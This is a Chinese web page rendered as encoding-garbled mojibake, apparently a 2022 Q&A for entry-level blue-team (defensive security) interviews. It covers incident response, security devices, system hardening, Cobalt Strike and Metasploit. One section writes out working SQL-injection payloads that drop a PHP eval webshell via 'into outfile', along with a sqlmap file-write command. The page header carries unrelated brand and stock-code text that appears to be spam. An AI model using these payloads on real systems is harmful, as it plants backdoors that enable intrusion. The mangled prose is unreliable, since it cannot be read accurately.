×ðÁú¿­Ê±

֤ȯ¼ò³Æ£º×ðÁú¿­Ê± ֤ȯ´úÂ룺002212
È«Ììºò7x24Сʱ·þÎñ£º 400-777-0777

2022ÄêÀ¶¶Ó³õ¼¶»¤Íø×ܽá

ʹÓù¤¾ßɨÃèµÄÁ÷Á¿Ò»Ñùƽ³£ÔÚÊý¾Ý°üÖÐÓÐÏà¹ØÌØÕ÷ÐÅÏ¢£¬ºÃ±È˵ͨ¹ýwiresharkÍøÂç·â°üÆÊÎö¹¤¾ß¶ÔÁ÷Á¿¾ÙÐÐÒ»¸öÏêϸµÄÅŲéÆÊÎö£¬ºÃ±Èͨ¹ýhttp contains "xxx"À´²éÕÒÊý¾Ý°üÖеÄÒªº¦×Ö ¡£

2022ÄêÀ¶¶Ó³õ¼¶»¤Íø×ܽá

Ðû²¼Ê±¼ä£º2022-08-27
ä¯ÀÀ´ÎÊý£º9222
·ÖÏí£º

Ò». ×°±¸Îó±¨ÈçÄÇÀïÖà £¿

´ð£º

À´×ÔÍâÍøµÄÎó±¨ËµÃ÷Çå¾²×°±¸ÐèÒª¾ÙÐÐÕ½ÂÔÉý¼¶£¬²»ÐèÒª´¦Öóͷ£ ¡£

ÈôÊÇÊÇÀ´×ÔÄÚÍøµÄÎ󱨿ÉÒÔºÍÈÏÕæÈËЭÉÌһϿ´Äܲ»¿É½â¾ö£¬ÓÐÐëÒªµÄ»°Ìí¼Ó°×Ãûµ¥´¦Öóͷ£ ¡£

¶þ. ÔõÑùÇø·ÖɨÃèÁ÷Á¿ºÍÊÖ¹¤Á÷Á¿ £¿

´ð£º

1.ɨÃèÁ÷Á¿Êý¾ÝÁ¿´ó£¬ÇëÇóÁ÷Á¿ÓмÍÂÉ¿ÉÑ­ÇÒÆµÂʽϸߣ¬ÊÖ¹¤Á÷Á¿ÇëÇóÉÙ£¬¾àÀëÂÔ³¤

2.ʹÓù¤¾ßɨÃèµÄÁ÷Á¿Ò»Ñùƽ³£ÔÚÊý¾Ý°üÖÐÓÐÏà¹ØÌØÕ÷ÐÅÏ¢£¬ºÃ±È˵ͨ¹ýwiresharkÍøÂç·â°üÆÊÎö¹¤¾ß¶ÔÁ÷Á¿¾ÙÐÐÒ»¸öÏêϸµÄÅŲéÆÊÎö£¬ºÃ±Èͨ¹ýhttp contains "xxx"À´²éÕÒÊý¾Ý°üÖеÄÒªº¦×Ö ¡£

ºÃ±È³£ÓõÄÎó²îɨÃ蹤¾ßAWVS£¬NessusÒÔ¼°APPscanÔÚÇëÇóµÄURL£¬Headers, BodyÈýÏîÀïËæ»ú°üÀ¨ÁËÄÜ´ú±í×Ô¼ºµÄÌØÕ÷ÐÅÏ¢ ¡£

Èý. ÍøÕ¾±»ÉÏ´«webshellÈçÄÇÀïÖà £¿

´ð£º

1.Ê×ÏȹرÕÍøÕ¾£¬ÏÂÏß·þÎñ ¡£ÓÐÐëÒªµÄ»°½«·þÎñÆ÷¶ÏÍø¸ôÀë ¡£

2.ÊÖ¹¤ÍŽṤ¾ß¾ÙÐмì²â ¡£

¹¤¾ß·½ÃæºÃ±ÈʹÓÃD¶Üwebshellkill£¬ºÓÂíwebshell²éɱ£¬°Ù¶ÈÔÚÏßwebshell²éɱµÈ¹¤¾ß¶ÔÍøÕ¾Ä¿Â¼¾ÙÐÐÅŲé²éɱ£¬ÈôÊÇÊÇÔÚ»¤ÍøÊ±´ú¿ÉÒÔ½«Ñù±¾±¸·ÝÔÙ¾ÙÐвéɱ ¡£

ÊÖ¹¤·½ÃæÁÙ±ÈδÉÏ´«webshellǰµÄ±¸·ÝÎļþ£¬´ÓÎļþÉõÖÁ´úÂë²ãÃæ¾ÙÐбÈÕÕ£¬¼ì²éÓÐÎÞºóÃųÌÐò»òÕ߯äËûÒì³£Îļþ£¬×Åʵ²»¿É¾ÍÖ±½ÓÓñ¸·ÝÎļþÌæ»»ÁË ¡£

4.ÔöÇ¿Çå¾²Õ½ÂÔ£¬ºÃ±È°´ÆÚ±¸·ÝÍøÕ¾ÉèÖÃÎļþ£¬ÊµÊ±×°Ö÷þÎñÆ÷²¹¶¡£¬°´ÆÚ¸üÐÂ×é¼þÒÔ¼°Çå¾²·À»¤Èí¼þ£¬°´ÆÚÐÞ¸ÄÃÜÂëµÈµÈ²½·¥ ¡£

ËÄ. ¸øÄãÒ»¸ö½ÏÁ¿´óµÄÈÕÖ¾£¬Ó¦¸ÃÔõÑùÆÊÎö £¿

´ð£º

¹¥»÷¹æÔòÆ¥Åäͨ¹ýÕýÔòÆ¥ÅäÈÕÖ¾ÖеĹ¥»÷ÇëÇó

ͳ¼ÆÒªÁ죬ͳ¼ÆÇëÇó·ºÆð´ÎÊý£¬´ÎÊýÉÙÓÚͬÀàÇëÇ󯽾ù´ÎÊýÔòΪÒì³£ÇëÇó

°×Ãûµ¥Ä£Ê½£¬ÎªÕý³£ÇëÇó½¨Éè°×Ãûµ¥£¬²»ÔÚÃûµ¥¹æÄ£ÄÚÔòΪÒì³£ÇëÇó

HMM Ä£×Ó£¬ÀàËÆÓÚ°×Ãûµ¥£¬²î±ðµãÔÚÓڿɶÔÕý³£ÇëÇó×Ô¶¯»¯½¨ÉèÄ£×Ó£¬´Ó¶øÍ¨¹ýÕý³£Ä£×ÓÕÒ³ö²»Æ¥ÅäÕßÔòΪÒì³£ÇëÇó

ʹÓÃÈÕÖ¾ÆÊÎö¹¤¾ß£¬ÈçLogForensics£¬Graylog£¬Nagios£¬ELK StackµÈµÈ

Îå. ³£¼ûOAϵͳ £¿

´ð£º

PHP£ºÍ¨´ïOA¡¢·ºÎ¢ Eoffice

Java£º·ºÎ¢OA/ÔÆÇÅ¡¢ÖÂÔ¶OA¡¢À¶ÁèOA¡¢ÓÃÓÑOA

ASP£ºÆôÀ³OA

Áù. ÏàʶÇå¾²×°±¸Â𠣿

´ð£º

ÈëÇÖ·ÀÓùϵͳIPS

ÊÇÅÌËã»úÍøÂçÇå¾²ÉèÊ©£¬ÊǶԷÀ²¡¶¾Èí¼þºÍ·À»ðǽµÄÔö²¹ ¡£ÈëÇÖÔ¤·ÀϵͳÊÇÒ»²¿Äܹ»¼àÊÓÍøÂç»òÍøÂç×°±¸µÄÍøÂçÊý¾Ý´«ÊäÐÐΪµÄÅÌËã»úÍøÂçÇå¾²×°±¸£¬Äܹ»¼´Ê±µÄÖÐÖ¹¡¢µ÷½â»ò¸ôÀëһЩ²»Õý³£»òÊǾßÓÐΣÏÕÐÔµÄÍøÂçÊý¾Ý´«ÊäÐÐΪ ¡£

ÈëÇÖ¼ì²âϵͳIDS

Æð¾¢×Ô¶¯µÄ·À»¤²½·¥£¬Æ¾Ö¤Ò»¶¨µÄÇå¾²Õ½ÂÔ£¬Í¨¹ýÈí¼þ£¬Ó²¼þ¶ÔÍøÂ磬ϵͳµÄÔËÐоÙÐÐʵʱµÄ¼à¿Ø£¬¾¡¿ÉÄܵط¢Ã÷ÍøÂç¹¥»÷ÐÐΪ£¬Æð¾¢×Ô¶¯µÄ´¦Öóͷ£¹¥»÷£¬°ü¹ÜÍøÂç×ÊÔ´µÄÉñÃØÐÔ£¬ÍêÕûÐԺͿÉÓÃÐÔ ¡£

·À»ðǽ

·À»ðǽÊÇλÓÚÁ½¸ö(»ò¶à¸ö)ÍøÂç¼ä£¬ÊµÑéÍøÂç¼ä»á¼û»ò¿ØÖƵÄÒ»×é×é¼þÜöÝÍÖ®Ó²¼þ»òÈí¼þ ¡£¸ôÀëÍøÂ磬Öƶ©³ö²î±ðÇøÓòÖ®¼äµÄ»á¼û¿ØÖÆÕ½ÂÔÀ´¿ØÖƲî±ðÐÅÍÐË®Æ½ÇøÓò¼ä´«Ë͵ÄÊý¾ÝÁ÷ ¡£

Êý¾Ý¿âÉó¼ÆÏµÍ³

ÊǶÔÊý¾Ý¿â»á¼ûÐÐΪ¾ÙÐÐî¿ÏµµÄϵͳ£¬Í¨¹ý¾µÏñ»òÕß̽ÕëµÄ·½·¨ÊÕÂÞËùÓÐÊý¾Ý¿âµÄ»á¼ûÁ÷Á¿£¬²¢»ùÓÚSQLÓï·¨£¬ÓïÒåµÄÆÊÎöÊÖÒÕ£¬¼Í¼Ï¶ÔÊý¾Ý¿âËùÓлá¼ûºÍ²Ù×÷ÐÐΪ£¬ÀýÈç»á¼ûÊý¾ÝµÄÓû§IP£¬Õ˺Å£¬Ê±¼äµÈµÈ£¬¶ÔÊý¾Ý¾ÙÐвÙ×÷µÄÐÐΪµÈµÈ ¡£

ÈÕÖ¾Éó¼ÆÏµÍ³

ÈÕÖ¾Éó¼ÆÏµÍ³Äܹ»Í¨¹ýÖ÷±»¶¯ÍŽáµÄÊֶΣ¬ÊµÊ±ÇÒ²»ÖÐÖ¹µÄÊÕÂÞÓû§ÍøÂçÖвî±ð³§É̵ÄÇå¾²×°±¸£¬ÍøÂç×°±¸£¬Ö÷»ú£¬²Ù×÷ϵͳÒÔ¼°ÖÖÖÖÓ¦ÓÃϵͳ±¬·¢µÄº£Á¿ÈÕÖ¾ÐÅÏ¢£¬²¢½«ÕâЩÐÅÏ¢ËѼ¯µ½Éó¼ÆÖÐÐÄ£¬¾ÙÐм¯Öл¯´æ´¢£¬±¸·Ý£¬ÅÌÎÊ£¬É󼯣¬¸æ¾¯£¬ÏìÓ¦£¬²¢³ö¾ß¸»ºñµÄ±¨±í±¨¸æ£¬»ñÏ¤È«ÍøµÄÕûÌåÇå¾²ÔËÐÐÌ¬ÊÆ£¬Í¬Ê±Öª×ãµÈ±£¹ØÓÚÇå¾²ÖÎÀíÖÐÐĵÄÈÕÖ¾ÉúÑÄʱ¼ä´óÓÚ6¸öÔµÄÒªÇó ¡£

±¤ÀÝ»ú

ÊÇÕë¶ÔÄÚ²¿ÔËάְԱµÄÔËάÇå¾²Éó¼ÆÏµÍ³ ¡£Ö÷Òª¹¦Ð§ÊǶÔÔËάְԱµÄÔËά²Ù×÷¾ÙÐÐÉó¼ÆºÍȨÏÞ¿ØÖÆ(ºÃ±ÈÒªµÇ¼ijЩƽ̨»òÕßϵͳֻÄÜͨ¹ý±¤ÀÝ»ú²Å¿ÉÒÔ£¬²»±Ø±¤ÀÝ»úÊÇÎÞ·¨»á¼ûµÄ) ¡£Í¬Ê±±¤ÀÝ»úÉÐÓÐÕ˺ż¯ÖÐÖÎÀí£¬µ¥µãµÇ¼(ÔÚ±¤ÀÝ»úÉϵǼ¼´¿ÉʵÏÖ¶Ô¶à¸öÆäËûƽ̨µÄÎÞÃܵǼ)µÈ¹¦Ð§ ¡£

Îó²îɨÃèϵͳ

Îó²îɨÃ蹤¾ß»òÕß×°±¸ÊÇ»ùÓÚÎó²îÊý¾Ý¿â£¬Í¨¹ýɨÃèµÈÊֶζÔÖ¸¶¨µÄÔ¶³Ì»òÍâµØÅÌËã»úϵͳµÄÇ徲ųÈõÐÔ¾ÙÐмì²â£¬·¢Ã÷¿ÉʹÓÃÎó²îµÄÒ»ÖÖÇå¾²¼ì²âϵͳ(ÎÒÃdz£ÓõÄÕë¶ÔWEBÕ¾µã¾ÙÐÐɨÃèµÄ¹¤¾ßºÍ´Ë´¦Îó²îɨÃèϵͳ²»ÊÇÒ»¸ö¿´·¨) ¡£

Êý¾ÝÇå¾²Ì¬ÊÆ¸Ð֪ƽ̨

ÒÔ´óÊý¾Ýƽ̨Ϊ»ù´¡£¬Í¨¹ýÍøÂç¶àÔª£¬Òì¹¹µÄº£Á¿ÈÕÖ¾£¬Ê¹ÓùØÁªÆÊÎö£¬»úеѧϰ£¬ÍþвÇ鱨£¬¿ÉÊÓ»¯µÈÊÖÒÕ£¬×ÊÖúÓû§Ò»Á¬¼à²âÍøÂçÇå¾²Ì¬ÊÆ£¬ÊµÏÖ´Ó±»¶¯·ÀÓùÏòÆð¾¢·ÀÓùµÄ½ø½× ¡£

ÖÕ¶ËÇå¾²ÖÎÀíϵͳ

ÊǼ¯·À²¡¶¾£¬ÖÕ¶ËÇå¾²¹Ü¿Ø£¬ÖÕ¶Ë×¼È룬ÖÕ¶ËÉ󼯣¬ÍâÉè¹Ü¿Ø£¬EDRµÈ¹¦Ð§ÓÚÒ»Ì壬¼æÈݲî±ð²Ù×÷ϵͳºÍÅÌËã»úƽ̨£¬×ÊÖú¿Í»§ÊµÏÖÆ½Ì¨Ò»Ì廯£¬¹¦Ð§Ò»Ì廯£¬Êý¾ÝÒ»Ì廯µÄÖÕ¶ËÇå¾²Á¢Ìå·À»¤ ¡£

WAF

WAFÊÇÒÔÍøÕ¾»òÓ¦ÓÃϵͳΪ½¹µãµÄÇå¾²²úÆ·£¬Í¨¹ý¶ÔHTTP»òHTTPSµÄWeb¹¥»÷ÐÐΪ¾ÙÐÐÆÊÎö²¢×èµ²£¬ÓÐÓõĽµµÍÍøÕ¾Ç徲Σº¦ ¡£²úÆ·Ö÷Òª°²ÅÅÔÚÍøÕ¾·þÎñÆ÷µÄǰ·½ ¡£Í¨¹ýÌØÕ÷ÌáÈ¡ºÍ·Ö¿é¼ìË÷ÊÖÒÕ¾ÙÐÐģʽƥÅäÀ´µÖ´ï¹ýÂË£¬ÆÊÎö£¬Ð£ÑéÍøÂçÇëÇó°üµÄÄ¿µÄ£¬ÔÚ°ü¹ÜÕý³£ÍøÂçÓ¦Óù¦Ð§µÄͬʱ£¬×è¶ô»òÕß×è¶ÏÎÞЧ»òÕß²»·¨µÄ¹¥»÷ÇëÇó ¡£

ÃÛ¹Þ

ÃÛ¹ÞÊÇÒ»ÖÖÇå¾²ÍþвµÄ×Ô¶¯·ÀÓùÊÖÒÕ£¬Ëüͨ¹ýÄ£ÄâÒ»¸ö»ò¶à¸öÒ×Êܹ¥»÷µÄÖ÷»ú»ò·þÎñÀ´ÎüÒý¹¥»÷Õߣ¬²¶»ñ¹¥»÷Á÷Á¿ÓëÑù±¾£¬·¢Ã÷ÍøÂçÍþв£¬ÌáÈ¡ÍþÐ²ÌØÕ÷£¬Ã۹޵ļÛÖµÔÚÓÚ±»Ì½²â£¬¹¥ÏÝ ¡£

Æß. Ïàʶ¹ýϵͳ¼Ó¹ÌÂ𠣿

´ð£º

ÕË»§Çå¾²

windows

ºÃ±ÈÉèÖõǼʱ²»ÏÔʾÉϴεǼµÄÓû§Ãû£¬±ÜÃâÈõ¿ÚÁî±¬ÆÆ ¡£

ÉèÖÃÕË»§Ëø¶¨Õ½ÂÔ£¬ºÃ±È˵µÇ¼ÐÐΪÏÞÖÆ´ÎÊý£¬µÖ´ï´ÎÊýºóËø¶¨¶à³¤Ê±¼ä ¡£

linux

½ûÓÃrootÖ®ÍâµÄ³¬µÈÓû§ ʹÓÃpassword -l <Óû§Ãû>ÏÂÁîÀ´Ëø¶¨Óû§ -u½âËø

ÏÞÖÆÍ¨Ë×Óû§Ê¹ÓÃsudoÌáȨ£¬»òÕß˵ÏÞÖÆÌáȨµÄȨÏÞ¾Þϸ

Ëø¶¨ÏµÍ³ÖжàÓàµÄ×Ô½¨Õ˺Å

ÉèÖÃÕË»§Ëø¶¨µÇ¼ʧ°ÜËø¶¨´ÎÊý£¬Ëø×¼Ê±¼ä faillog -u <Óû§Ãû>ÏÂÁîÀ´½âËøÓû§

¿ÚÁîÇå¾²

windows

ÉèÖÃÃÜÂë±ØÐèÇкÏÖØ´óÐÔÒªÇ󣬺ñÈÉèÖÃʱÊý×Ö£¬´óд×Öĸ£¬Ð¡Ð´×Öĸ£¬ÌØÊâ×Ö·û¶¼Òª¾ß±¸

ÉèÖÃ×îСÃÜÂ볤¶È²»¿ÉΪ0£¬ÉèÖò»¿ÉʹÓÃÀúÊ·ÃÜÂë

linux

¼ì²éshadowÖпտÚÁîÕ˺Å£¬Ð޸ĿÚÁîÖØÆ¯ºó£¬ÉèÖÃÃÜÂëÓÐÓÃÆÚvim /etc/login.defÏÂÁî

·þÎñÓë¶Ë¿ÚÊÕÁ²

¹Ø±Õ»òÕßÏÞÖÆ³£¼ûµÄ¸ßΣ¶Ë¿Ú£¬ºÃ±È˵22¶Ë¿Ú(SSH)£¬23¶Ë¿Ú(Telnet)£¬3389¶Ë¿Ú(RDP)

compmgmt.mscÅŲéÍýÏëʹÃü

linuxÉÏiptables·â½ûIP»òÕßÏÞÖÆ¶Ë¿Ú

ÎļþȨÏÞÖÎÀí

linuxÉÏchmodÐÞ¸ÄÎļþȨÏÞ chattrÖ÷ÒªÎļþÉèÖò»¿ÉÐÞ¸ÄȨÏÞ

ϵͳÈÕÖ¾Éó¼Æ

linuxÉÏÉèÖÃϵͳÈÕÖ¾Õ½ÂÔÉèÖÃÎļþ

ϵͳÈÕÖ¾ /var/log/message

cronÈÕÖ¾/var/log/cron

Çå¾²ÈÕÖ¾/var/log/secure

×°±¸ºÍÍøÂç¿ØÖÆ

ºÃ±ÈÔÚÉæÃÜÅÌËã»úÉÏեȡ»á¼ûÍâÍø£¬ÎªÁË×èÖ¹Óû§ÈƹýÕ½ÂÔ¿ÉÒÔեȡÓû§ÐÞ¸ÄIP

ɾ³ýĬÈÏ·ÓÉÉèÖã¬×èֹʹÓÃĬÈÏ·ÓÉ̽²âÍøÂç

եȡʹÓÃUSB×°±¸ºÃ±ÈUÅÌ

եȡpingÏÂÁ¼´½ûÓÃICMPЭÒé»á¼û£¬²»ÈÃÍⲿpingͨ·þÎñÆ÷

°Ë. ÓÐûÓÐÇå¾²×°±¸µÄʹÓÃÂÄÀú £¿

´ð£º

Ì¬ÊÆ¸ÐÖª»òÕß˵Çå¾²ÔËÓª·½Ã濪ԴÏîÄ¿OSSIM ¡£

IPS(ÈëÇÖ·ÀÓùϵͳ)·½ÃæSnortºÍÇå¾²Ñó´ÐSecurity Onion ¡£

·À»ðǽ·½ÃæTinyWallºÍClearOS£¬»òÕß˵Ïñ»ðÈÞ£¬ÌÚѶÇå¾²¹Ü¼ÒµÈһЩͨÀýµÄ·À»¤Èí¼þ ¡£

WAF£¨WebÓ¦Ó÷À»ðǽ £©·½ÃæModSecurityºÍÍøÕ¾Çå¾²¹·ÒÔ¼°¸¡Í¼ ¡£

ÍþвÇ鱨·½ÃæMISPºÍOpenCTI ¡£

Îó²îɨÃè·½ÃæOpenVAS£¬Õë¶ÔwebÕ¾µãµÄÎó²îɨÃ蹤¾ßʹÓùýAWVS£¬Nessus

±¤ÀÝ»ú·½ÃæJumpServer(linuxϵͳװÖ㬵«¿ÉÒÔÌí¼ÓwindowsÖ÷»ú×÷Ϊ×ʲú) ¡£

ÃÛ¹Þ·½ÃæT-Pot(»ùÓÚLinuxϵͳװÖÃ)ºÍ΢²½µÄHfish ¡£

¾Å. CSÊÇʲô¹¤¾ß£¬ÖªµÀÔõôʹÓÃÂ𠣿

´ð£º

¼ò½é

CobaltStrikeÊÇÒ»¿îÉøÍ¸²âÊÔ¹¤¾ß£¬±»Òµ½çÈ˳ÆÎªCS ¡£CobaltStrike·ÖΪ¿Í»§¶ËÓë·þÎñ¶Ë£¬·þÎñ¶ËÊÇÒ»¸ö£¬¿Í»§¶Ë¿ÉÒÔÓжà¸ö£¬¿ÉÓÃÓÚÍŶÓÂþÑÜʽЭͬ²Ù×÷ ¡£

¹¦Ð§

CobaltStrike ¼¯³ÉÁ˶˿Úת·¢£¬·þÎñɨÃ裬×Ô¶¯»¯Òç³ö£¬¶àģʽ¶Ë¿Ú¼àÌý£¬windows exe ľ ÂíÌìÉú£¬windows dll ľÂíÌìÉú£¬java ľÂíÌìÉú£¬office ºê²¡¶¾ÌìÉú£¬Ä¾ÂíÀ¦°ó ¡£´¹ÂÚ¹¥»÷µÈ¹¦Ð§ ¡£

ʹÓÃ

Ò»Ñùƽ³£Ê¹Óð취¾ÍÊÇ£¬ÏÈÆô¶¯·þÎñ¶Ë£¬È»ºóÆô¶¯¿Í»§¶ËÅþÁ¬»ñµÃÒ»¸ö¿ÉÊÓ»¯µÄ½çÃæ£¬Ð½¨¼àÌýÆ÷À´ÎüÊջỰ£¬ÌìÉúľÂíÎļþ(³£¼û.exe¿ÉÖ´ÐÐÎļþ£¬officeºê²¡¶¾£¬htmlÓ¦ÓóÌÐòÀàÐ͵ĺóÃÅÎļþ)£¬ÉÏ´«µ½Êܺ¦ÕßÖ÷»ú£¬µ±Êܺ¦ÕßÔËÐиÃľÂíÎļþʱĿµÄÖ÷»ú¾ÍÔÚCSÉÏÏßÁË ¡£

Ê®. WAF·½ÃæÓÐûÓÐÏàʶ¹ý£¬ÇåÎúWAFµÄ·ÖÀàºÍÔ­ÀíÂ𠣿

´ð£º

·ÖÀࣺ

WAF·ÖΪ·ÇǶÈëÐÍWAFºÍǶÈëÐÍWAF£¬·ÇǶÈëÐÍÖ¸µÄÊÇÓ²WAF¡¢ÔÆWAF¡¢ÐéÄâ»úWAFÖ®ÀàµÄ£»Ç¶ÈëÐÍÖ¸µÄÊÇwebÈÝÆ÷Ä £¿éÀàÐÍWAF¡¢´úÂë²ãWAF ¡£

Ô­Àí£º

WebÓ¦Ó÷À»ðǽÊÇͨ¹ýÖ´ÐÐһϵÁÐÕë¶ÔHTTP»òÕßHTTPSµÄÇå¾²Õ½ÂÔÀ´×¨ÃÅΪWebÓ¦ÓÃÌṩ±£»¤µÄÒ»¿î²úÆ· ¡£WAF¶ÔÇëÇóµÄÄÚÈݾÙÐйæÔòÆ¥Åä¡¢ÐÐΪÆÊÎöµÈʶ±ð³ö¶ñÒâÐÐΪ£¬²¢Ö´ÐÐÏà¹ØÐж¯£¬ÕâЩÐж¯°üÀ¨×è¶Ï¡¢¼Í¼¡¢¸æ¾¯µÈ ¡£

ʮһ. PowershellÏàʶ¹ýÂ𠣿

´ð£º

¼ò½é

PowerShell ÊÇÒ»ÖÖÏÂÁîÐÐÍâ¿Ç³ÌÐòºÍ¾ç±¾ÇéÐΣ¬Ö÷ÒªÓÃÓÚWindowsÅÌËã»úÀû±ãÖÎÀíÔ±¾ÙÐÐϵͳÖÎÀí²¢ÓпÉÄÜÔÚδÀ´È¡´úWindowsÉϵÄĬÈÏÏÂÁîÌáÐÑ·û ¡£PowerShell¾ç±¾ÒòÆäÓÅÒìµÄ¹¦Ð§ÌØÕ÷³£ÓÃÓÚÕý³£µÄϵͳÖÎÀíºÍÇå¾²ÉèÖÃÊÂÇé ¡£

ʹÓÃ

³£¼ûµÄ²Ù×÷ pwd ls cd mkdir rm

get-process»ñÈ¡ËùÓÐÀú³ÌÐÅÏ¢

get-date»ñȡĿ½ñʱ¼äÐÅÏ¢

get-host»ñȡĿ½ñÖ÷»úÐÅÏ¢

È»ºó¾ÍÊÇʹÓÃPowersSploit(»ùÓÚPowershellµÄºóÉøÍ¸¿ò¼ÜÈí¼þ£¬°üÀ¨ÁËÐí¶àPower shell¹¥»÷¾ç±¾£¬Ö÷ÒªÓÃÓÚÉøÍ¸ÖеÄÐÅÏ¢ÍøÂ磬ȨÏÞÌáÉý£¬È¨ÏÞά³Ö)µÄʱ¼äÔÚPowshellÉÏʹÓùýһЩÏÂÔØºÍÔËÐй¥»÷¾ç±¾µÄÏÂÁî ¡£

Ê®¶þ. MSFÊÇʲô £¿ÖªµÀÔõôʹÓÃÂ𠣿

´ð£º

¼ò½é£º

Metasploit Framework(MSF)ÊÇÒ»¿î¿ªÔ´Çå¾²Îó²î¼ì²â¹¤¾ß£¬¸½´øÊýǧ¸öÒÑÖªµÄÈí¼þÎó²î£¬²¢¼á³ÖÒ»Á¬¸üР¡£Metasploit¿ÉÒÔÓÃÀ´ÐÅÏ¢ÍøÂç¡¢Îó²î̽²â¡¢Îó²îʹÓõÈÉøÍ¸²âÊÔµÄÈ«Á÷³Ì ¡£

Ä £¿é£º

Auxiliary£¨¸¨ÖúÄ £¿é£©

ÎªÉøÍ¸²âÊÔÐÅÏ¢ËѼ¯ÌṩÁË´ó×ڵĸ¨ÖúÄ £¿éÖ§³Ö

Exploits£¨¹¥»÷Ä £¿é£©

ʹÓ÷¢Ã÷µÄÇå¾²Îó²î»òÉèÖÃÈõµã¶ÔÔ¶³ÌÄ¿µÄϵͳ ¾ÙÐй¥»÷£¬´Ó¶ø»ñµÃ¶ÔÔ¶³ÌÄ¿µÄϵͳ»á¼ûȨµÄ´úÂë×é¼þ ¡£

Payload£¨¹¥»÷ÔØºÉÄ £¿é£©

¹¥»÷Àֳɺó´Ùʹ°Ð»úÔËÐеÄÒ»¶ÎÖ²Èë´úÂë

Post £¨ºóÉøÍ¸¹¥»÷Ä £¿é£©

ÍøÂç¸ü¶àÐÅÏ¢»ò½øÒ»²½»á¼û±»Ê¹ÓõÄÄ¿µÄϵͳ

Encoders£¨±àÂëÄ £¿é£©

½«¹¥»÷ÔØºÉ¾ÙÐбàÂ룬À´Èƹý·À»¤Èí¼þ×èµ²

ʹÓãº

Ê×ÏÈʹÓÃAuxiliary¸¨Öú̽²âÄ £¿éɨÃ裬Ðá̽£¬Ö¸ÎÆÊ¶±ðÏà¹ØÎó²î£¬È»ºóÈ·ÈÏÎó²î±£´æÊ¹ÓÃExploitÎó²îʹÓÃÄ £¿é¶ÔÎó²î¾ÙÐÐʹÓ㬰üÀ¨ÉèÖÃpayload¹¥»÷ÔØºÉ£¬ÉèÖñ¾»ú¼àÌýµÈµÈ ¡£Îó²îʹÓÃÀÖ³ÉÄ¿µÄÖ÷»ú¾Í»áͨ¹ýÉèÖõĶ˿Ú×Ô¶¯ÅþÁ¬£¬±¬·¢»á»° ¡£½ø¶ø¿ÉÒÔ¾ÙÐкóÉøÍ¸ ¡£

¹¦Ð§£º

ľÂíÃâɱ£¬×¥È¡Óû§ÃÜÂ룬¹Ø±Õɱ¶¾Èí¼þ£¬ÆÁÄ»½ØÍ¼£¬Ð½¨Õ˺Å£¬Ô¶³ÌµÇ¼£¬Ç¨áãÀú³Ì£¬ÌáȨ²Ù×÷£¬ÍøÂçÐá̽£¬¶Ë¿Úת·¢ £¬ÄÚÍøÊðÀí£¬ÄÚÍøÉ¨Ã裬ÌìÉúºóÃÅ£¬É¨³ýÈÕÖ¾µÈµÈ ¡£

Ê®Èý. ʹÓùýʲôXSSƽ̨Â𠣿

´ð£º

1.Ç廪À¶Á«»¨Õ½¶ÓµÄBlueLotus ¡£

2.xss-platformƽ̨ ¡£

2.kaliÖеÄbeefƽ̨ ¡£

3.ʹÓù¤¾ßPostman ¡£

Ê®ËÄ. SQL×¢ÈëÔõôдÈëwebshell £¿

´ð£º

Ìõ¼þ£º

1¡¢ÖªµÀweb¾ø¶Ô·¾¶

2¡¢ÓÐÎļþдÈëȨÏÞ(Ò»Ñùƽ³£ÇéÐÎÖ»ÓÐROOTÓû§ÓÐ)

3¡¢Êý¾Ý¿â¿ªÆôÁËsecure_file_privÉèÖÃ

È»ºó¾ÍÄÜÓÃselect into outfileдÈëwebshell

³£¼ûÊÖ·¨£º

ÍŽá×¢ÈëдÈë

?id=1' union select 1,"<?php @eval($_POST['shell']);?>",3 into outfile 'C:\\phpstudy\\WWW\\sqli\\shell.php'#

dumpfileº¯ÊýдÈë

?id=1' union select 1,"<?php @eval($_POST['shell']);?>",3 into dumpfile 'C:\\phpstudy\\WWW\\sqli\\shell.php'#

lines terminated by дÈë

?id=1 into outfile 'C:/wamp64/www/shell.php' lines terminated by '<?php phpinfo()?>';

//lines terminated by ¿ÉÒÔÃ÷ȷΪ ÒÔÿÐÐÖÕÖ¹µÄλÖÃÌí¼Ó xx ÄÚÈÝ ¡£

lines starting by дÈë

?id=1 into outfile 'C:/wamp64/www/shell.php' lines starting by '<?php phpinfo()?>';//ʹÓà lines starting by Óï¾äÆ´½ÓwebshellµÄÄÚÈÝ ¡£lines starting by ¿ÉÒÔÃ÷ȷΪ ÒÔÿÐÐ×îÏȵÄλÖÃÌí¼Ó xx ÄÚÈÝ ¡£

fields terminated by дÈë

?id=1 into outfile 'C:/wamp64/www/work/shell.php' fields terminated by '<?php phpinfo() ?>';//ʹÓà fields terminated by Óï¾äÆ´½ÓwebshellµÄÄÚÈÝ ¡£fields terminated by ¿ÉÒÔÃ÷ȷΪ ÒÔÿ¸ö×ֶεÄλÖÃÌí¼Ó xx ÄÚÈÝ ¡£

columns terminated by дÈë

?id=1 into outfile 'C:/wamp64/www/shell.php' COLUMNS terminated by '<?php phpinfo() ?>';//ʹÓà fields terminated by Óï¾äÆ´½ÓwebshellµÄÄÚÈÝ ¡£fields terminated by ¿ÉÒÔÃ÷ȷΪ ÒÔÿ¸ö×ֶεÄλÖÃÌí¼Ó xx ÄÚÈÝ ¡£

sqlmapдÈë

д£º(ҪдµÄÎļþ£¬±ØÐèÔÚkali±¾»úÀïÓÐ)дÈëµ½ /tmp Ŀ¼Ï sqlmap -u "http://127.0.0.1/index.php?page=user-info.php&username=a%27f%27v&password=afv&user-info-php-submit-button=View+Account+Details" -p 'username' --file-write="shell.php" --file-dest="/tmp/shell.php"

Ê®Îå. Ïàʶ¹ý·´ÐòÁл¯Îó²îÂ𠣿

´ð£º

Ô­Àí£º

ÐòÁл¯ÊÇÖ¸³ÌÐò½«¹¤¾ßת»¯Îª×Ö½ÚÐòÁдӶø±ãÓÚ´æ´¢ÔËÊäµÄÒ»ÖÖ·½·¨£¬·´ÐòÁл¯ÔòÓëÆäÏà·´£¬¼´½«×Ö½ÚÐòÁÐת»¯Îª¹¤¾ß¹©³ÌÐòʹÓà ¡£³ÌÐòÔÚ¾ÙÐз´ÐòÁл¯Ê±»áŲÓÃһЩº¯Êý£¬ºÃ±È³£¼ûµÄPHP·´ÐòÁл¯º¯Êýunserialize()ÒÔ¼°Ò»Ð©³£¼ûµÄħÊõÒªÁ죬ºÃ±È½á¹¹º¯Êý_construct()£¬Îö¹¹º¯Êý_destruct()£¬_wakeup()£¬_toString()£¬_sleep()µÈµÈ 